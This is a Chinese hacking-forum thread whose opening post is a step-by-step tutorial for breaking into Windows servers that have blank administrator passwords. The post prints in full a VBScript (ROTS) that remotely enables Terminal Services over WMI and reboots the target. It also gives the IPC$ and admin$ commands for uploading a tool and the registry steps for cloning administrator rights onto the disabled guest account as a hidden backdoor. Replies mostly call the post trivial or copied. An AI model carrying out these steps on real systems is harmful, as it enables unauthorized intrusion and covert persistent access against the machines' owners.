20CN网络安全小组论坛 - 菜鸟乐园 - 一次简单的3389入侵过程

论坛: 菜鸟乐园标题: 一次简单的3389入侵过程

作者: jianphu [jianphu]

论坛用户

扫描的X-Scan V2.3、WINNTAutoAttack、流光！
X-Scan我最近很少用了，基本用的都是WINNTAutoAttack，当然，小榕的流光我也经常用！
远程开终端需要一个脚本就可以了，代码请看二楼！保存为*.vbe（我保存的是rots.vbe）
克隆帐户用个psu就可以了~！

OK，比如扫描到了一个有NT弱口令的服务器，IP地址是120.0.0.1，管理员帐户是administrator，密码为空
运行CMD（2000下的DOS），我们给它开终端！
命令如下！
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
上面的命令应该可以理解吧？cscript rots.vbe这是命令，后面的是IP，然后是管理员帐户，接这是密码，因为120.0.0.1这台服务器的管理员密码是空的，那就用双引号表示为空，再后面是端口，你可以任意设置终端的端口，/fr是重启命令（强制重启，一般我都用这个，你也可以/r，这是普通重启）

因为终端服务器只在win2000 server以上的版本（包括server）才有，PRO当然是不行的，此版本可以检测服务器的版本，如果是PRO的则提示你退出安装！

一切顺利，过会就可以连接到终端了，我们可以ping它，看是否重启，ping 120.0.0.1 -t
安装后用连接工具连接终端！现在我们克隆帐户，呵呵，为了给以后方便嘛！

回到DOS下！我们建立IPC$连接！
net use \\120.0.0.1\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧！命令完成后，我们把psu上传到目标机的winnt\system32目录下！
copy psu.exe \\120.0.0.1\admin$\system32
上传完毕后，开始在肉鸡做后门帐户！看肉鸡！

假设guest用户被禁用，我们就是要利用guest做后门帐户！
在该服务器运行CMD，在命令行下输入
psu -p regedit -i PID

这里解释一下，后面的PID是系统进程winlogon的值，我们在任务栏下点鼠标右键，看任务管理器！
看进程选项卡，找到winlogon的进程，后面的数值就是winlogon的pid值，假设是5458
那么，命令就是这样
psu -p regedit -i 5458
这样直接打开注册表，可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
下面的就是本地的用户信息了！我们要做的是把禁用的guest克隆成管理员权限的帐户！
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator的类型，是if4，再看guest的是if5
好了，知道了类型后，打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这个值，双击右侧的F，把里面乱七八糟的字符复制下来，然后打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
双击右侧的F，把刚复制的粘贴到里面！

做好了以后，把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出，导出后把那两个键值删除！然后再导入进来！关闭注册表。

打开CMD，在命令行下输入
net user guest password
这条命令是给guest设置密码，后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户，然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行！

OK了，打开计算机管理，看用户，你们看，guest帐户还是被禁用的~！哈哈，但它已经拥有管理员权限了！
而且并不在管理员组里显示，还可以登陆终端，跟administrator帐户一样的！

注销一下，用guest登陆吧！

打字都打累了~`！真不容易！呵呵~`希望上面的大家能看懂啊！
如果还有地方不明白的话，可以问我，我知道的一定告诉大家！

因为本人也是菜鸟级的，会了点东西就不知道怎么好了，呵呵~`！如果哪里有不对的，还请高手指点啊~！

----------------------------------------------------------------------
以下是开终端的脚本，把它存为*.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if

ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if

usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true

outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "OS type is "&objinstoscaption.caption
outstreem.write "Do you want to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next

outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)

rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
outstreem.write "Now, reboot target...."
strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"

function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function

function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visite www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function

地主发表时间: 06/21 17:56

回复: hacker521 [hacker521]

论坛用户

呵呵，好象有点太简单了吧，这种入侵很多人都会呀

B1层发表时间: 06/22 21:03

回复: miku [miku]

论坛用户

没有什么新意，但作为基础文章还是很好的。
希望以后多写些网站入侵的文章，不要写有弱口令的哦，那样就没有什么挑战性了。也学不到什么东西！

B2层发表时间: 06/22 22:29

回复: hacker521 [hacker521]

论坛用户

这样不好吧，要是别人的网站被黑了，罪过就大了，阿弥陀佛~~~~~~罪过罪过

B3层发表时间: 06/23 06:37

回复: shavb [shavb]

论坛用户

我晕了啊呀

B4层发表时间: 06/23 08:13

回复: ayu_f1 [ayu_f1]

论坛用户

难道他的帐号不是adm密码不为空的话就不能入侵了吗？

B5层发表时间: 07/05 14:10

回复: hacker521 [hacker521]

论坛用户

那要看具体情况而定，一般菜鸟会找漏洞来入侵，黑客会自己找一些隐藏漏洞，自己遍程序入侵

B6层发表时间: 07/05 16:35

回复: maomao520 [maomao520]

论坛用户

哦哦
听起来很厉害哦！

B7层发表时间: 07/06 11:25

回复: Jove [jove]

论坛用户

前提是建立在对方的管理远设置的是弱口令下
这也太。。。。
还不如用计算机管理直接连接他你想开什么服务就开什么服务telnet
想启动什么帐号就。。。

B8层发表时间: 07/06 17:02

回复: aney [aney]

论坛用户

垃圾！！！这种谁都会的就别往这上面放！！

B9层发表时间: 07/06 20:33

回复: hacker521 [hacker521]

论坛用户

同意，建议楼上上的再学两年才来论坛回帖

B10层发表时间: 07/07 16:56

回复: all528 [all528]

论坛用户

烂
admin$=肉鸡

[此贴被小明王(all528) 在 07月25日13时32分编辑过]

B11层发表时间: 07/22 20:25

回复: hitler007 [hitler007]

论坛用户

我不是小学生，这东西是哪儿copy来的？用google能找一大堆

B12层发表时间: 07/22 21:26

回复: suson [suson]

论坛用户

ai...

B13层发表时间: 07/23 01:10

回复: aoshen [aoshen]

论坛用户

什么嘛不要泄气我支持你`呵呵不过我可是一个

真正的菜鸟帮不上你什么的`有时间帮帮我`

B14层发表时间: 07/23 15:23

回复: dtmxzwb [dtmxzwb]

论坛用户

林子大了什么鸟都有！！！！！！
你们觉得简单可有人不会！
这是菜鸟乐园，本来就不是贴给你看的！！！

B15层发表时间: 07/23 19:43

回复: jacky8714 [jacky8714]

论坛用户

各位否定也要分正面和侧面，你们是不是太直接了，很打击人的积极性哦

B16层发表时间: 07/23 20:27

回复: hacker521 [hacker521]

论坛用户

越挫越勇嘛，挫折是前进的动力呀！！！！！！

B17层发表时间: 07/23 20:30

回复: conjurer [conjurer16]

论坛用户

我是一只刚出生的菜鸟，这篇文章对我很有用。再次感谢你。
我希望你有空能帮帮我，我的QQ是47274426，加我吧！我们
慢慢神聊！

B18层发表时间: 07/23 22:54

回复: DarkRock [darkrock]

论坛用户

从一个网站抄来的，晕

B19层发表时间: 07/24 10:21

回复: xrb [xrb]

论坛用户

问一下这是用什么语言编的？？？？？？

B20层发表时间: 07/24 22:05

回复: hacker521 [hacker521]

论坛用户

用记事本编的，你只要喜欢也可以编一个

B21层发表时间: 07/25 08:21

回复: lslsuv [lslsuv]

论坛用户

我就是菜地

啥也不懂呢

真想找个师傅！

谁愿意当俺师傅呀？

我的qq是5440720

邮箱是：wangchengliang@mail.china.com

B22层发表时间: 07/25 09:40

回复: xrb [xrb]

论坛用户

哦我知道了用VB的脚本语言记得原来有个文件碎片炸弹就用他

B23层发表时间: 07/26 00:18

回复: zhong [zhong]

见习版主

人家的机ADM是不可能空的

B24层发表时间: 07/26 03:11

论坛: 菜鸟乐园